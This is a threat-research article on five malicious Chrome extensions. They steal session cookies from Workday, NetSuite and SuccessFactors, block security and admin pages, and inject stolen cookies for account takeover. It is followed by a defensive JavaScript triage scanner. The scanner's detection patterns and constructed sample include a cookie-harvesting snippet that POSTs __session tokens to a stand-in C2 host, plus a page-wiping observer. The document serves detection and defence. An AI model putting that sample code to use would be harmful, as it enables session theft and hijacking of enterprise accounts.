Socket’s Threat Research Team has uncovered a coordinated Chrome extension campaign targeting enterprise HR and ERP platforms, including Workday, NetSuite, and SAP SuccessFactors.
Five malicious extensions, collectively installed over 2,300 times, work together to steal session tokens, block security controls, and enable complete account takeover through session hijacking.
Four of the extensions are published under the developer name databycloud1104, while a fifth, branded as Software Access, uses different naming but shares identical infrastructure, code patterns, and target platforms.
Despite posing as productivity and access-control tools, all five implement hidden credential theft and interfere with incident response.
The extensions are marketed as tools to streamline access to “premium” enterprise tools and manage multiple HR/ERP accounts.
Listings for DataByCloud 2 show a polished dashboard with account cards, dollar amounts, and “ACCESS TOOL” buttons, suggesting a legitimate way to manage multiple Workday or NetSuite accounts.
Other extensions, like Tool Access 11, claim to “restrict access to special tools” and prevent users from reaching “administrative features that could compromise the accounts,” positioning themselves as security enhancers rather than threats.
Behind these claims, the extensions request seemingly standard permissions to connect to enterprise platforms, while privacy policies falsely state that they “will not collect or use your data.”
In reality, analysis reveals aggressive cookie extraction, undisclosed network exfiltration, and targeted blocking of security and incident response pages.
Three-Pronged Attack Chain
Socket’s analysis shows the campaign relies on three coordinated attack types across the five extensions:
1. Cookie Exfiltration and Persistent Session Monitoring
DataByCloud Access, Data By Cloud 1, and Software Access extract __session cookies holding authentication tokens for Workday, NetSuite, and SuccessFactors.
The extensions pull all cookies for the targeted domains, filter for __session, decode the value, and send it to attacker-controlled APIs at api.databycloud[.]com or api.software-access[.]com every 60 seconds.
A combination of cookie-change listeners and Chrome alarms ensures fresh tokens are continuously harvested, even as users log out and back in.
2. Administrative Page Blocking and IR Suppression
Tool Access 11 and Data By Cloud 2 manipulate the DOM to block access to critical administrative and security pages in Workday.
By detecting specific page headers via XPath and immediately wiping document.body.innerHTML, then redirecting users to malformed URLs, they prevent access to authentication policies, session controls, password changes, account deactivation, MFA device management, and security audit logs.
A tight MutationObserver loop and periodic page reloads ensure the blocking persists across dynamic content and long sessions, including in Workday’s sandbox environment.
3. Bidirectional Cookie Injection and Session Hijacking
Software Access goes beyond theft, enabling direct account takeover. After receiving stolen cookies from its C2 server, the extension parses them and uses chrome.cookies.set() to inject them into the attacker’s browser.
This allows threat actors to assume a victim’s authenticated session without passwords or MFA challenges, turning the browser into a turnkey console for enterprise HR and ERP account access.
The extensions share identical session-extraction logic, security-tool detection lists, and API paths (/api/v1/mv3), strongly indicating a single operator running a modular toolset rather than unrelated publishers.
Two variants bundle the DisableDevtool library to detect and disrupt developer tools, while Software Access adds logic to prevent password fields from being converted to plain text during inspection, directly obstructing security analysis.
Despite their enterprise branding, the associated domains show classic disposable infrastructure patterns.
![The software-access[.]com domain returns an SSL handshake error, indicating no functional web service is hosted at the domain.](https://cdn.sanity.io/images/cgdhsj6q/production/d445f3153d7fd2882e1f0e240a64171bbc7b733c-2048x1282.png?w=1600&q=95&fit=max&auto=format)
The root domains databycloud[.]com and software-access[.]com either return 404 errors or SSL handshake failures, with only the API subdomains kept alive for command-and-control traffic. There is no legitimate product, documentation, or support presence backing the promised “premium tools.”
Enterprise Impact and Current Status
Socket has submitted takedown requests to Google’s Chrome Web Store security team; all five extensions remain under investigation at the time of writing.
By combining continuous cookie theft, incident response blocking, and automated session hijacking, this extension cluster creates a scenario in which security teams may detect suspicious access but cannot remediate through normal controls: attempts to change passwords, deactivate accounts, adjust security policies, or review sign-on history are silently neutralized in the victim’s browser.
Socket recommends that enterprises immediately audit Chrome extensions across their environments, remove any matching these families, block the related command-and-control domains, and reset affected credentials from clean, uncompromised systems, since a reset attempted in a browser running one of these extensions can be blocked outright or simply yield a fresh session cookie to harvest.
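The extension audit recommended above can be started offline with a triage script like the one below. It is an added example written for this article, not Socket’s tooling or code from the reported extensions. It scores an unpacked extension’s manifest and scripts against the behaviours the write-up describes across all three attack types: the cookies permission paired with host access to the HR/ERP platforms, __session filtering driven by a cookie-change listener and a chrome.alarms beacon, the document.body.innerHTML wipe under a MutationObserver with XPath header matching, chrome.cookies.set() of server-supplied cookies, the shared /api/v1/mv3 path and the two C2 domains, and the DisableDevtool library. The platform host list (including myworkday.com for Workday tenants), the indicator weights, the verdict thresholds, and both extension samples are constructed for the example.

```javascript
// Added example (not from the Socket report or the extensions): offline triage of an
// unpacked Chrome extension against the indicators described in this article.
// The platform host list, indicator weights and verdict thresholds are assumptions.

const TARGET_HOSTS = ["workday.com", "myworkday.com", "netsuite.com", "successfactors.com"]; // assumed

// Behavioural indicators from the write-up, matched over the extension's script sources.
const INDICATORS = [
  { name: "session-cookie-filter", re: /__session/, weight: 3 },
  { name: "cookie-read", re: /chrome\.cookies\.getAll\s*\(/, weight: 2 },
  { name: "cookie-write", re: /chrome\.cookies\.set\s*\(/, weight: 3 },
  { name: "cookie-change-listener", re: /chrome\.cookies\.onChanged\.addListener/, weight: 2 },
  { name: "alarm-beacon", re: /chrome\.alarms\.create\s*\(/, weight: 1 },
  { name: "dom-wipe", re: /document\.body\.innerHTML\s*=\s*(['"`])\1/, weight: 2 },
  { name: "mutation-observer", re: /new\s+MutationObserver\s*\(/, weight: 1 },
  { name: "xpath-header-match", re: /document\.evaluate\s*\(/, weight: 1 },
  { name: "mv3-api-path", re: /\/api\/v1\/mv3/, weight: 4 },
  { name: "devtools-blocker", re: /disable-?devtool/i, weight: 2 },
  { name: "c2-domain", re: /databycloud\.com|software-access\.com/, weight: 5 },
];

// Which target platforms a single match pattern grants access to.
function hostsFromPattern(pattern) {
  if (pattern === "<all_urls>") return TARGET_HOSTS.slice();
  const m = /^(?:\*|https?|wss?):\/\/([^/]+)\//.exec(pattern);
  if (!m) return [];                       // "cookies", "tabs", ... are not match patterns
  const host = m[1].replace(/^\*\./, "");  // "*.workday.com" -> "workday.com"
  if (host === "*") return TARGET_HOSTS.slice();
  return TARGET_HOSTS.filter((t) => host === t || host.endsWith("." + t));
}

// Target platforms reachable via host_permissions (MV3), permissions (MV2) or content_scripts.
function coveredTargetHosts(manifest) {
  const patterns = [
    ...(manifest.host_permissions || []),
    ...(manifest.permissions || []),
    ...(manifest.content_scripts || []).flatMap((cs) => cs.matches || []),
  ];
  return [...new Set(patterns.flatMap(hostsFromPattern))].sort();
}

// Run every indicator over the concatenated script sources.
function scanScripts(scripts) {
  const source = Object.values(scripts).join("\n");
  return INDICATORS.filter((ind) => ind.re.test(source));
}

function triageExtension(ext) {
  const { manifest, scripts } = ext;
  const hasCookies = (manifest.permissions || []).includes("cookies");
  const targets = coveredTargetHosts(manifest);
  const hits = scanScripts(scripts);
  const score = hits.reduce((sum, h) => sum + h.weight, 0);
  const indicators = hits.map((h) => h.name);
  let verdict = "pass";
  if (indicators.includes("c2-domain") || indicators.includes("mv3-api-path")) {
    verdict = "block";   // infrastructure overlap with the reported families
  } else if (hasCookies && targets.length > 0 && score >= 5) {
    verdict = "review";  // cookie access to an HR/ERP host plus harvesting or blocking behaviour
  }
  return { name: manifest.name, hasCookies, targets, indicators, score, verdict };
}

// Constructed samples: a skeleton showing the reported behaviours, and a benign extension.
const SUSPICIOUS = {
  manifest: {
    manifest_version: 3,
    name: "Sample Access Tool (constructed)",
    permissions: ["cookies", "alarms", "storage"],
    host_permissions: ["*://*.workday.com/*", "*://*.netsuite.com/*", "https://api.example-c2.test/*"],
  },
  scripts: {
    "background.js": `
      chrome.alarms.create("sync", { periodInMinutes: 1 });
      chrome.cookies.onChanged.addListener(() => harvest());
      async function harvest() {
        const all = await chrome.cookies.getAll({ domain: "workday.com" });
        const s = all.filter(c => c.name === "__session");
        fetch("https://api.example-c2.test/api/v1/mv3", { method: "POST", body: JSON.stringify(s) });
      }`,
    "content.js": `
      const xp = "//h2[contains(., 'Security Audit')]";
      new MutationObserver(() => {
        if (document.evaluate(xp, document, null, 9, null).singleNodeValue) document.body.innerHTML = "";
      }).observe(document, { childList: true, subtree: true });`,
  },
};
const BENIGN = {
  manifest: { manifest_version: 3, name: "Sample Tab Grouper (constructed)", permissions: ["tabs", "storage"], host_permissions: [] },
  scripts: { "background.js": `chrome.tabs.onCreated.addListener(t => chrome.storage.local.set({ last: t.id }));` },
};

for (const ext of [SUSPICIOUS, BENIGN]) {
  console.log(JSON.stringify(triageExtension(ext)));
}
```

A "block" verdict here is driven by infrastructure overlap alone, which is the strongest signal the write-up gives; the score-based "review" tier exists because a legitimate SSO helper can also hold the cookies permission on an HR domain, so that combination on its own only warrants a manual look at the script, not removal.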
